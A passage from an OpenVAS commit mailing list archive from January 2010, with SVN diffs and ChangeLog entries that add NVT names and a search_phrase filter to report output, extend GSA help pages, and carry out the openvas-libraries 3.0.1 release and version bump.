(result_iterator_nvt_oid, result_iterator_nvt_name): New functions. + + * src/manage.h: Update headers accordingly. + + * src/omp.c: Update result_iterator_nvt callers. + (print_report_xml): Add name to NVT element. + (omp_xml_handle_end_element): In CLIENT_GET_REPORT XML report, add name + to NVT element. + +2010-01-11 Matthew Mundell + Send all preferences when starting a task, even those which have the same value on the server, to match the client behaviour. Modified: trunk/openvas-manager/src/manage.h =================================================================== --- trunk/openvas-manager/src/manage.h 2010-01-11 12:47:40 UTC (rev 6361) +++ trunk/openvas-manager/src/manage.h 2010-01-11 13:01:07 UTC (rev 6362) @@ -639,9 +639,12 @@ result_iterator_port (iterator_t*); const char* -result_iterator_nvt (iterator_t*); +result_iterator_nvt_oid (iterator_t*); const char* +result_iterator_nvt_name (iterator_t *); + +const char* result_iterator_type (iterator_t*); const char* Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2010-01-11 12:47:40 UTC (rev 6361) +++ trunk/openvas-manager/src/omp.c 2010-01-11 13:01:07 UTC (rev 6362) @@ -3200,7 +3200,9 @@ while (next (&results)) { gchar *descr; + const char *name; + name = result_iterator_nvt_name (&results); descr = g_markup_escape_text (result_iterator_descr (&results), -1); // FIX as in other %s" "%s" "%s" - "%s" + "%s" "%s" "%s" "", result_iterator_subnet (&results), result_iterator_host (&results), result_iterator_port (&results), - result_iterator_nvt (&results), + result_iterator_nvt_oid (&results), + name ? name : "", result_iterator_type (&results), descr); g_free (descr); @@ -3877,7 +3880,7 @@ "\\end{longtable}\n" "\n" "\\begin{longtable}{|p{\\textwidth * 1}|}\n", - result_iterator_nvt (&results)); + result_iterator_nvt_oid (&results)); } if (last_port) @@ -4712,21 +4715,24 @@ { const char *descr = result_iterator_descr (&results); gchar *nl_descr = descr ? convert_to_newlines (descr) : NULL; - SENDF_TO_CLIENT_OR_FAIL ("" - "%s" - "%s" - "%s" - "%s" - "%s" - "%s" - "", - result_iterator_subnet (&results), - result_iterator_host (&results), - result_iterator_port (&results), - result_iterator_nvt (&results), - result_type_threat - (result_iterator_type (&results)), - descr ? nl_descr : ""); + const char *name = result_iterator_nvt_name (&results); + SENDF_TO_CLIENT_OR_FAIL + ("" + "%s" + "%s" + "%s" + "%s" + "%s" + "%s" + "", + result_iterator_subnet (&results), + result_iterator_host (&results), + result_iterator_port (&results), + result_iterator_nvt_oid (&results), + name ? name : "", + result_type_threat + (result_iterator_type (&results)), + descr ? nl_descr : ""); if (descr) g_free (nl_descr); } SENDF_TO_CLIENT_OR_FAIL (""); @@ -4785,7 +4791,7 @@ result_iterator_subnet (&results), result_iterator_host (&results), result_iterator_port (&results), - result_iterator_nvt (&results), + result_iterator_nvt_oid (&results), result_iterator_type (&results), result_iterator_descr (&results)); cleanup_iterator (&results); Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2010-01-11 12:47:40 UTC (rev 6361) +++ trunk/openvas-manager/src/tasks_sql.h 2010-01-11 13:01:07 UTC (rev 6362) @@ -3481,6 +3481,7 @@ { nvti_t *nvti = nvti_new (); nvti_set_oid (nvti, nvt_iterator_oid (&nvts)); + nvti_set_name (nvti, nvt_iterator_name (&nvts)); nvti_set_family (nvti, nvt_iterator_family (&nvts)); nvtis_add (nvti_cache, nvti); } @@ -4654,7 +4655,26 @@ DEF_ACCESS (subnet, 0); DEF_ACCESS (host, 1); DEF_ACCESS (port, 2); -DEF_ACCESS (nvt, 3); +DEF_ACCESS (nvt_oid, 3); + +/** + * @brief Get the NVT name from a result iterator. + * + * @param[in] iterator Iterator. + * + * @return The name of the NVT that produced the result, or NULL on error. + */ +const char* +result_iterator_nvt_name (iterator_t *iterator) +{ + nvti_t *nvti; + if (iterator->done) return NULL; + nvti = nvtis_lookup (nvti_cache, result_iterator_nvt_oid (iterator)); + if (nvti) + return nvti_name (nvti); + return NULL; +} + DEF_ACCESS (type, 4); DEF_ACCESS (descr, 5); From scm-commit at wald.intevation.org Mon Jan 11 14:11:29 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 14:11:29 +0100 (CET) Subject: [Openvas-commits] r6363 - in trunk/gsa: . src/html/src Message-ID: <20100111131129.209B4861F2DB@pyrosoma.intevation.org> Author: mattm Date: 2010-01-11 14:11:28 +0100 (Mon, 11 Jan 2010) New Revision: 6363 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/omp.xsl Log: * src/html/src/omp.xsl (result) [detailed]: Add NVT name. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-11 13:01:07 UTC (rev 6362) +++ trunk/gsa/ChangeLog 2010-01-11 13:11:28 UTC (rev 6363) @@ -1,3 +1,7 @@ +2010-01-11 Matthew Mundell + + * src/html/src/omp.xsl (result) [detailed]: Add NVT name. + 2010-01-11 Jan-Oliver Wagner Updating help. Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-11 13:01:07 UTC (rev 6362) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-11 13:11:28 UTC (rev 6363) @@ -3903,13 +3903,27 @@
                -
                +
                + +
                From scm-commit at wald.intevation.org Mon Jan 11 14:20:43 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 14:20:43 +0100 (CET) Subject: [Openvas-commits] r6364 - in trunk/gsa: . src/html/src src/html/src/help Message-ID: <20100111132043.22BE4861F2D8@pyrosoma.intevation.org> Author: felix Date: 2010-01-11 14:20:41 +0100 (Mon, 11 Jan 2010) New Revision: 6364 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/help/configure_credentials.htm4 trunk/gsa/src/html/src/help/configure_escalators.htm4 trunk/gsa/src/html/src/help/configure_targets.htm4 trunk/gsa/src/html/src/omp.xsl Log: Updated help * src/html/src/help/configure_credentials.htm4, src/html/src/help/configure_escalators.html4, src/html/src/help/configure_targets.htm4: Updated with "details" section. * src/html/src/omp.xsl: Link from pages to new help texts. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-11 13:11:28 UTC (rev 6363) +++ trunk/gsa/ChangeLog 2010-01-11 13:20:41 UTC (rev 6364) @@ -1,3 +1,14 @@ +2010-01-11 Felix Wolfsteller + + Updated help + + * src/html/src/help/configure_credentials.htm4, + src/html/src/help/configure_escalators.html4, + src/html/src/help/configure_targets.htm4: Updated with "details" + section. + + * src/html/src/omp.xsl: Link from pages to new help texts. + 2010-01-11 Matthew Mundell * src/html/src/omp.xsl (result) [detailed]: Add NVT name. Modified: trunk/gsa/src/html/src/help/configure_credentials.htm4 =================================================================== --- trunk/gsa/src/html/src/help/configure_credentials.htm4 2010-01-11 13:11:28 UTC (rev 6363) +++ trunk/gsa/src/html/src/help/configure_credentials.htm4 2010-01-11 13:20:41 UTC (rev 6364) @@ -173,4 +173,19 @@ packages).

                + +

                Credential Details

                + +

                +Provides information about credentials like the login and comment. +

                + +

                Targets using this Credential

                + +

                +This table provides an overview of the targets associated with this credential. +Details of these targets can be seen after a click on the Details +Details icon. +

                + m4_include(`footer.m4') Modified: trunk/gsa/src/html/src/help/configure_escalators.htm4 =================================================================== --- trunk/gsa/src/html/src/help/configure_escalators.htm4 2010-01-11 13:11:28 UTC (rev 6363) +++ trunk/gsa/src/html/src/help/configure_escalators.htm4 2010-01-11 13:20:41 UTC (rev 6364) @@ -130,4 +130,20 @@ dummy data.

                + +

                Escalator Details

                + +

                +Provides information about an escalator like the name, comment, condition and +notification method. +

                + +

                Tasks using this Escalators

                + +

                +This table provides an overview of the tasks associated with this escalator. +Details of these tasks can be seen after a click on the Details +Details icon. +

                + m4_include(`footer.m4') Modified: trunk/gsa/src/html/src/help/configure_targets.htm4 =================================================================== --- trunk/gsa/src/html/src/help/configure_targets.htm4 2010-01-11 13:11:28 UTC (rev 6363) +++ trunk/gsa/src/html/src/help/configure_targets.htm4 2010-01-11 13:20:41 UTC (rev 6364) @@ -137,4 +137,24 @@ will show details of the target specification and Tasks that use this target.

                + +

                Target Details

                + +

                +Provides detailed information about the target. +This includes the name, comment and the maximum number of hosts to scan. +If credentials are associated with this target, its name can be seen. A click +on the credentials name will show more information about the associated +credentials. +

                + +

                Tasks using this Target

                + +

                +This table provides an overview of the tasks that are associated to the target +(if any). +Details of these tasks can be seen after a click on the Details +Details icon. +

                + m4_include(`footer.m4') Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-11 13:11:28 UTC (rev 6363) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-11 13:20:41 UTC (rev 6364) @@ -1519,7 +1519,13 @@
                -
                Credential Details
                +
                + Credential Details + + + +
                Back to Credentials @@ -2046,7 +2052,13 @@
                -
                Escalator Details
                +
                + Escalator Details + + + +
                Back to Escalators @@ -2368,7 +2380,13 @@
                -
                Target Details
                +
                + Target Details + + + +
                Back to Targets From scm-commit at wald.intevation.org Mon Jan 11 14:49:51 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 14:49:51 +0100 (CET) Subject: [Openvas-commits] r6365 - in trunk/openvas-libraries: . doc Message-ID: <20100111134951.CAB2D86607BA@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-11 14:49:49 +0100 (Mon, 11 Jan 2010) New Revision: 6365 Modified: trunk/openvas-libraries/CHANGES trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/doc/Doxyfile trunk/openvas-libraries/doc/Doxyfile_full Log: Preparing the openvas-libraries 3.0.1 release. * CHANGES: Updated. * VERSION: Set to 3.0.1. * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. Modified: trunk/openvas-libraries/CHANGES =================================================================== --- trunk/openvas-libraries/CHANGES 2010-01-11 13:20:41 UTC (rev 6364) +++ trunk/openvas-libraries/CHANGES 2010-01-11 13:49:49 UTC (rev 6365) @@ -1,3 +1,21 @@ +openvas-libraries 3.0.1 (2010-01-11) + +This is the first maintenance release of the openvas-libraries module for the +Open Vulnerability Assessment System (OpenVAS) 3.0 series. + +It contains an update to the OMP API and solves an issue that raised the version +dependency on GnuTLS unnecessarily. + +Many thanks to everyone who has contributed to this release: +Matthew Mundell, Michael Wiegand and Felix Wolfsteller + +Main changes compared to 3.0.0: + +* The OMP API has been updated. +* An unnecessary GnuTLS call has been removed. +* Minor code cleanups. + + openvas-libraries 3.0.0 (2009-12-18) This is the 3.0.0 release of the openvas-libraries module for the Open Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2010-01-11 13:20:41 UTC (rev 6364) +++ trunk/openvas-libraries/ChangeLog 2010-01-11 13:49:49 UTC (rev 6365) @@ -1,3 +1,13 @@ +2010-01-11 Michael Wiegand + + Preparing the openvas-libraries 3.0.1 release. + + * CHANGES: Updated. + + * VERSION: Set to 3.0.1. + + * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. + 2010-01-11 Felix Wolfsteller * hg/hg_add_hosts.c (hg_add_host), hg/hg_add_hosts.h (hg_add_host): Modified: trunk/openvas-libraries/doc/Doxyfile =================================================================== --- trunk/openvas-libraries/doc/Doxyfile 2010-01-11 13:20:41 UTC (rev 6364) +++ trunk/openvas-libraries/doc/Doxyfile 2010-01-11 13:49:49 UTC (rev 6365) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.1.SVN +PROJECT_NUMBER = 3.0.1 # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. Modified: trunk/openvas-libraries/doc/Doxyfile_full =================================================================== --- trunk/openvas-libraries/doc/Doxyfile_full 2010-01-11 13:20:41 UTC (rev 6364) +++ trunk/openvas-libraries/doc/Doxyfile_full 2010-01-11 13:49:49 UTC (rev 6365) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.1.SVN +PROJECT_NUMBER = 3.0.1 # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. From scm-commit at wald.intevation.org Mon Jan 11 15:01:26 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 15:01:26 +0100 (CET) Subject: [Openvas-commits] r6366 - trunk/openvas-libraries Message-ID: <20100111140126.0769986607B7@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-11 15:01:25 +0100 (Mon, 11 Jan 2010) New Revision: 6366 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/VERSION Log: Committed VERSION file missing from the last commit. * VERSION: Set to 3.0.1. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2010-01-11 13:49:49 UTC (rev 6365) +++ trunk/openvas-libraries/ChangeLog 2010-01-11 14:01:25 UTC (rev 6366) @@ -1,5 +1,11 @@ 2010-01-11 Michael Wiegand + Committed VERSION file missing from the last commit. + + * VERSION: Set to 3.0.1. + +2010-01-11 Michael Wiegand + Preparing the openvas-libraries 3.0.1 release. * CHANGES: Updated. Modified: trunk/openvas-libraries/VERSION =================================================================== --- trunk/openvas-libraries/VERSION 2010-01-11 13:49:49 UTC (rev 6365) +++ trunk/openvas-libraries/VERSION 2010-01-11 14:01:25 UTC (rev 6366) @@ -1 +1 @@ -3.0.1.SVN +3.0.1 From scm-commit at wald.intevation.org Mon Jan 11 15:05:45 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 15:05:45 +0100 (CET) Subject: [Openvas-commits] r6367 - in trunk/openvas-manager: . src Message-ID: <20100111140545.0D58686607DE@pyrosoma.intevation.org> Author: mattm Date: 2010-01-11 15:05:43 +0100 (Mon, 11 Jan 2010) New Revision: 6367 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/tasks_sql.h Log: * src/tasks_sql.h (init_otp_pref_iterator): Correct string in assertion. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-11 14:01:25 UTC (rev 6366) +++ trunk/openvas-manager/ChangeLog 2010-01-11 14:05:43 UTC (rev 6367) @@ -1,5 +1,9 @@ 2010-01-11 Matthew Mundell + * src/tasks_sql.h (init_otp_pref_iterator): Correct string in assertion. + +2010-01-11 Matthew Mundell + * src/tasks_sql.h (init_manage): Add NVT names to cache. (result_iterator_nvt): Remove, rename with _oid. (result_iterator_nvt_oid, result_iterator_nvt_name): New functions. Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2010-01-11 14:01:25 UTC (rev 6366) +++ trunk/openvas-manager/src/tasks_sql.h 2010-01-11 14:05:43 UTC (rev 6367) @@ -7176,7 +7176,7 @@ assert (config); assert (section); - assert ((strcmp (section, "PLUGIN_PREFS") == 0) + assert ((strcmp (section, "PLUGINS_PREFS") == 0) || (strcmp (section, "SERVER_PREFS") == 0)); quoted_config = sql_quote (config); From scm-commit at wald.intevation.org Mon Jan 11 15:22:02 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 15:22:02 +0100 (CET) Subject: [Openvas-commits] r6368 - tags Message-ID: <20100111142202.C59D386607BA@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-11 15:22:02 +0100 (Mon, 11 Jan 2010) New Revision: 6368 Added: tags/openvas-libraries-release-3.0.1/ Log: Tagging the openvas-libraries 3.0.1 release. Copied: tags/openvas-libraries-release-3.0.1 (from rev 6367, trunk/openvas-libraries) From scm-commit at wald.intevation.org Mon Jan 11 15:23:46 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 15:23:46 +0100 (CET) Subject: [Openvas-commits] r6369 - in trunk/openvas-libraries: . doc Message-ID: <20100111142346.B1B1D86607BA@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-11 15:23:45 +0100 (Mon, 11 Jan 2010) New Revision: 6369 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/VERSION trunk/openvas-libraries/doc/Doxyfile trunk/openvas-libraries/doc/Doxyfile_full Log: Post-release version bump. * VERSION: Set to 3.0.2.SVN. * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2010-01-11 14:22:02 UTC (rev 6368) +++ trunk/openvas-libraries/ChangeLog 2010-01-11 14:23:45 UTC (rev 6369) @@ -1,5 +1,13 @@ 2010-01-11 Michael Wiegand + Post-release version bump. + + * VERSION: Set to 3.0.2.SVN. + + * doc/Doxyfile, doc/Doxyfile_full: Updated PROJECT_NUMBER. + +2010-01-11 Michael Wiegand + Committed VERSION file missing from the last commit. * VERSION: Set to 3.0.1. Modified: trunk/openvas-libraries/VERSION =================================================================== --- trunk/openvas-libraries/VERSION 2010-01-11 14:22:02 UTC (rev 6368) +++ trunk/openvas-libraries/VERSION 2010-01-11 14:23:45 UTC (rev 6369) @@ -1 +1 @@ -3.0.1 +3.0.2.SVN Modified: trunk/openvas-libraries/doc/Doxyfile =================================================================== --- trunk/openvas-libraries/doc/Doxyfile 2010-01-11 14:22:02 UTC (rev 6368) +++ trunk/openvas-libraries/doc/Doxyfile 2010-01-11 14:23:45 UTC (rev 6369) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.1 +PROJECT_NUMBER = 3.0.2.SVN # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. Modified: trunk/openvas-libraries/doc/Doxyfile_full =================================================================== --- trunk/openvas-libraries/doc/Doxyfile_full 2010-01-11 14:22:02 UTC (rev 6368) +++ trunk/openvas-libraries/doc/Doxyfile_full 2010-01-11 14:23:45 UTC (rev 6369) @@ -23,7 +23,7 @@ # This could be handy for archiving the generated documentation or # if some version control system is used. -PROJECT_NUMBER = 3.0.1 +PROJECT_NUMBER = 3.0.2.SVN # The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) # base path where the generated documentation will be put. From scm-commit at wald.intevation.org Mon Jan 11 16:19:46 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 16:19:46 +0100 (CET) Subject: [Openvas-commits] r6370 - in trunk/gsa: . src Message-ID: <20100111151946.0234B86607AB@pyrosoma.intevation.org> Author: mattm Date: 2010-01-11 16:19:45 +0100 (Mon, 11 Jan 2010) New Revision: 6370 Modified: trunk/gsa/ChangeLog trunk/gsa/src/gsad.c Log: * src/gsad.c (request_handler): Pass gsize to get_system_report_omp. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-11 14:23:45 UTC (rev 6369) +++ trunk/gsa/ChangeLog 2010-01-11 15:19:45 UTC (rev 6370) @@ -1,7 +1,11 @@ +2010-01-11 Matthew Mundell + + * src/gsad.c (request_handler): Pass gsize to get_system_report_omp. + 2010-01-11 Felix Wolfsteller Updated help - + * src/html/src/help/configure_credentials.htm4, src/html/src/help/configure_escalators.html4, src/html/src/help/configure_targets.htm4: Updated with "details" Modified: trunk/gsa/src/gsad.c =================================================================== --- trunk/gsa/src/gsad.c 2010-01-11 14:23:45 UTC (rev 6369) +++ trunk/gsa/src/gsad.c 2010-01-11 15:19:45 UTC (rev 6370) @@ -2469,7 +2469,7 @@ strlen ("/system_report/"))) /* flawfinder: ignore, it is a const str */ { - unsigned int res_len; + gsize res_len; const char *duration; duration = MHD_lookup_connection_value (connection, @@ -2485,8 +2485,8 @@ &content_disposition, &res_len); if (res == NULL) return MHD_NO; - response = MHD_create_response_from_data (res_len, res, - MHD_NO, MHD_YES); + response = MHD_create_response_from_data ((unsigned int) res_len, + res, MHD_NO, MHD_YES); if (content_type != NULL) { MHD_add_response_header (response, MHD_HTTP_HEADER_CONTENT_TYPE, From scm-commit at wald.intevation.org Mon Jan 11 21:32:37 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 21:32:37 +0100 (CET) Subject: [Openvas-commits] r6371 - trunk/doc/website Message-ID: <20100111203237.D4F0986607CA@pyrosoma.intevation.org> Author: mime Date: 2010-01-11 21:32:36 +0100 (Mon, 11 Jan 2010) New Revision: 6371 Modified: trunk/doc/website/template_header.m4 Log: Updated download link for openvas-libraries Modified: trunk/doc/website/template_header.m4 =================================================================== --- trunk/doc/website/template_header.m4 2010-01-11 15:19:45 UTC (rev 6370) +++ trunk/doc/website/template_header.m4 2010-01-11 20:32:36 UTC (rev 6371) @@ -150,7 +150,7 @@

                OpenVAS 3.0:
                - openvas-libraries 3.0.0
                + openvas-libraries 3.0.1
                openvas-scanner 3.0.0
                openvas-client 3.0.0
                Optional:
                From scm-commit at wald.intevation.org Mon Jan 11 23:03:42 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 11 Jan 2010 23:03:42 +0100 (CET) Subject: [Openvas-commits] r6372 - in trunk/openvas-manager: . src Message-ID: <20100111220342.D4986865F4B2@pyrosoma.intevation.org> Author: mattm Date: 2010-01-11 23:03:40 +0100 (Mon, 11 Jan 2010) New Revision: 6372 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/manage.h trunk/openvas-manager/src/omp.c trunk/openvas-manager/src/tasks_sql.h Log: Add a search_phrase attribute to OMP GET_REPORT and switch GET_REPORT to the new callback data mechanism. * src/tasks_sql.h (where_levels): Make static. Add NULL check. (where_search_phrase): New function. (init_result_iterator, report_scan_result_count): Add param search_phrase. * src/manage.h: Update headers accordingly. * src/omp.c (create_config_data_reset, get_system_reports_data_reset) (command_data_init): Make static. (name_command_data_reset): Define out for now. (get_report_data_t): New type. (get_report_data_reset): New function. (get_report_data): New variable. (omp_xml_handle_start_element, omp_xml_handle_end_element) (print_report_latex, print_report_xml): Switch GET_REPORT to pass data between callbacks via get_report_data. Add GET_REPORT attribute "search_phrase". Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-11 20:32:36 UTC (rev 6371) +++ trunk/openvas-manager/ChangeLog 2010-01-11 22:03:40 UTC (rev 6372) @@ -1,5 +1,27 @@ 2010-01-11 Matthew Mundell + Add a search_phrase attribute to OMP GET_REPORT and switch GET_REPORT to + the new callback data mechanism. + + * src/tasks_sql.h (where_levels): Make static. Add NULL check. + (where_search_phrase): New function. + (init_result_iterator, report_scan_result_count): Add param search_phrase. + + * src/manage.h: Update headers accordingly. + + * src/omp.c (create_config_data_reset, get_system_reports_data_reset) + (command_data_init): Make static. + (name_command_data_reset): Define out for now. + (get_report_data_t): New type. + (get_report_data_reset): New function. + (get_report_data): New variable. + (omp_xml_handle_start_element, omp_xml_handle_end_element) + (print_report_latex, print_report_xml): Switch GET_REPORT to pass data + between callbacks via get_report_data. Add GET_REPORT attribute + "search_phrase". + +2010-01-11 Matthew Mundell + * src/tasks_sql.h (init_otp_pref_iterator): Correct string in assertion. 2010-01-11 Matthew Mundell Modified: trunk/openvas-manager/src/manage.h =================================================================== --- trunk/openvas-manager/src/manage.h 2010-01-11 20:32:36 UTC (rev 6371) +++ trunk/openvas-manager/src/manage.h 2010-01-11 22:03:40 UTC (rev 6372) @@ -584,7 +584,7 @@ report_scan_run_status (report_t, int*); int -report_scan_result_count (report_t, const char*, int*); +report_scan_result_count (report_t, const char*, const char*, int*); int report_counts (const char*, int*, int*, int*, int*, int*); @@ -624,7 +624,7 @@ void init_result_iterator (iterator_t*, task_t, const char*, int, int, int, - const char *, const char *); + const char *, const char *, const char *); gboolean next_report (iterator_t*, report_t*); Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2010-01-11 20:32:36 UTC (rev 6371) +++ trunk/openvas-manager/src/omp.c 2010-01-11 22:03:40 UTC (rev 6372) @@ -446,7 +446,7 @@ } create_config_data_t; // array members must be created separately -void +static void create_config_data_reset (create_config_data_t *data) { int index = 0; @@ -483,20 +483,45 @@ char *name; } name_command_data_t; -void +#if 0 +static void name_command_data_reset (name_command_data_t *data) { free (data->name); memset (data, 0, sizeof (name_command_data_t)); } +#endif typedef struct { + char *format; + char *report_id; + int first_result; + int max_results; + char *sort_field; + int sort_order; + char *levels; + char *search_phrase; +} get_report_data_t; + +static void +get_report_data_reset (get_report_data_t *data) +{ + free (data->format); + free (data->report_id); + free (data->sort_field); + free (data->levels); + free (data->search_phrase); + memset (data, 0, sizeof (get_report_data_t)); +} + +typedef struct +{ char *name; char *duration; } get_system_reports_data_t; -void +static void get_system_reports_data_reset (get_system_reports_data_t *data) { free (data->name); @@ -507,11 +532,12 @@ typedef union { create_config_data_t create_config; + get_report_data_t get_report; get_system_reports_data_t get_system_reports; name_command_data_t name_command; } command_data_t; -void +static void command_data_init (command_data_t *data) { memset (data, 0, sizeof (command_data_t)); @@ -525,6 +551,9 @@ create_config_data_t *create_config_data = (create_config_data_t*) &(command_data.create_config); +get_report_data_t *get_report_data + = &(command_data.get_report); + get_system_reports_data_t *get_system_reports_data = &(command_data.get_system_reports); @@ -1427,46 +1456,50 @@ const gchar* attribute; if (find_attribute (attribute_names, attribute_values, "report_id", &attribute)) - openvas_append_string (¤t_uuid, attribute); + openvas_append_string (&get_report_data->report_id, attribute); if (find_attribute (attribute_names, attribute_values, "format", &attribute)) - openvas_append_string (¤t_format, attribute); + openvas_append_string (&get_report_data->format, attribute); if (find_attribute (attribute_names, attribute_values, "first_result", &attribute)) /* Subtract 1 to switch from 1 to 0 indexing. */ - current_int_1 = atoi (attribute) - 1; + get_report_data->first_result = atoi (attribute) - 1; else - current_int_1 = 0; + get_report_data->first_result = 0; if (find_attribute (attribute_names, attribute_values, "max_results", &attribute)) - current_int_2 = atoi (attribute); + get_report_data->max_results = atoi (attribute); else - current_int_2 = -1; + get_report_data->max_results = -1; if (find_attribute (attribute_names, attribute_values, "sort_field", &attribute)) - openvas_append_string (¤t_name, attribute); + openvas_append_string (&get_report_data->sort_field, attribute); if (find_attribute (attribute_names, attribute_values, "sort_order", &attribute)) - current_int_3 = strcmp (attribute, "descending"); + get_report_data->sort_order = strcmp (attribute, "descending"); else { if (current_name == NULL || (strcmp (current_name, "type") == 0)) /* Normally it makes more sense to order type descending. */ - current_int_3 = 0; + get_report_data->sort_order = 0; else - current_int_3 = 1; + get_report_data->sort_order = 1; } if (find_attribute (attribute_names, attribute_values, "levels", &attribute)) - openvas_append_string (&modify_task_value, attribute); + openvas_append_string (&get_report_data->levels, attribute); + if (find_attribute (attribute_names, attribute_values, + "search_phrase", &attribute)) + openvas_append_string (&get_report_data->search_phrase, attribute); + set_client_state (CLIENT_GET_REPORT); } else if (strcasecmp ("GET_RULES", element_name) == 0) @@ -3190,12 +3223,12 @@ cleanup_iterator (&hosts); init_result_iterator (&results, report, NULL, - current_int_1, /* First result. */ - current_int_2, /* Max results. */ + get_report_data->first_result, + get_report_data->max_results, ascending, sort_field, - /* Attribute levels. */ - modify_task_value); + get_report_data->levels, + get_report_data->search_phrase); while (next (&results)) { @@ -3783,12 +3816,12 @@ ); init_result_iterator (&results, report, host, - current_int_1, /* First result. */ - current_int_2, /* Max results. */ + get_report_data->first_result, + get_report_data->max_results, ascending, sort_field, - /* Attribute levels. */ - modify_task_value); + get_report_data->levels, + get_report_data->search_phrase); last_port = NULL; while (next (&results)) { @@ -3817,12 +3850,12 @@ /* Print the result details. */ init_result_iterator (&results, report, host, - current_int_1, /* First result. */ - current_int_2, /* Max results. */ + get_report_data->first_result, + get_report_data->max_results, ascending, sort_field, - /* Attribute levels. */ - modify_task_value); + get_report_data->levels, + get_report_data->search_phrase); last_port = NULL; /* Results are ordered by port, and then by severity (more severity * before less severe). */ @@ -4451,13 +4484,13 @@ assert (strcasecmp ("GET_REPORT", element_name) == 0); if (current_credentials.username == NULL) { - openvas_free_string_var (¤t_uuid); + get_report_data_reset (get_report_data); SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("get_report")); set_client_state (CLIENT_AUTHENTIC); break; } - if (current_uuid == NULL) /* Attribute report_id. */ + if (get_report_data->report_id == NULL) SEND_TO_CLIENT_OR_FAIL (XML_ERROR_SYNTAX ("get_report", "GET_REPORT must have a report_id attribute")); @@ -4468,48 +4501,48 @@ GString *nbe; gchar *content; - if (find_report (current_uuid, &report)) + if (find_report (get_report_data->report_id, &report)) SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("get_report")); else if (report == 0) { if (send_find_error_to_client ("get_report", "report", - current_uuid)) + get_report_data->report_id)) { error_send_to_client (error); return; } } - else if (current_format == NULL - || strcasecmp (current_format, "xml") == 0) + else if (get_report_data->format == NULL + || strcasecmp (get_report_data->format, "xml") == 0) { task_t task; char *tsk_uuid = NULL, *start_time, *end_time; int result_count, filtered_result_count, run_status; const char *levels; - /* Attribute levels. */ - levels = modify_task_value ? modify_task_value : "hmlgd"; + levels = get_report_data->levels + ? get_report_data->levels : "hmlgd"; if (report_task (report, &task)) { SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("get_report")); - openvas_free_string_var (¤t_uuid); - openvas_free_string_var (¤t_format); + get_report_data_reset (get_report_data); set_client_state (CLIENT_AUTHENTIC); break; } else if (task && task_uuid (task, &tsk_uuid)) { SEND_TO_CLIENT_OR_FAIL (XML_INTERNAL_ERROR ("get_report")); - openvas_free_string_var (¤t_uuid); - openvas_free_string_var (¤t_format); + get_report_data_reset (get_report_data); set_client_state 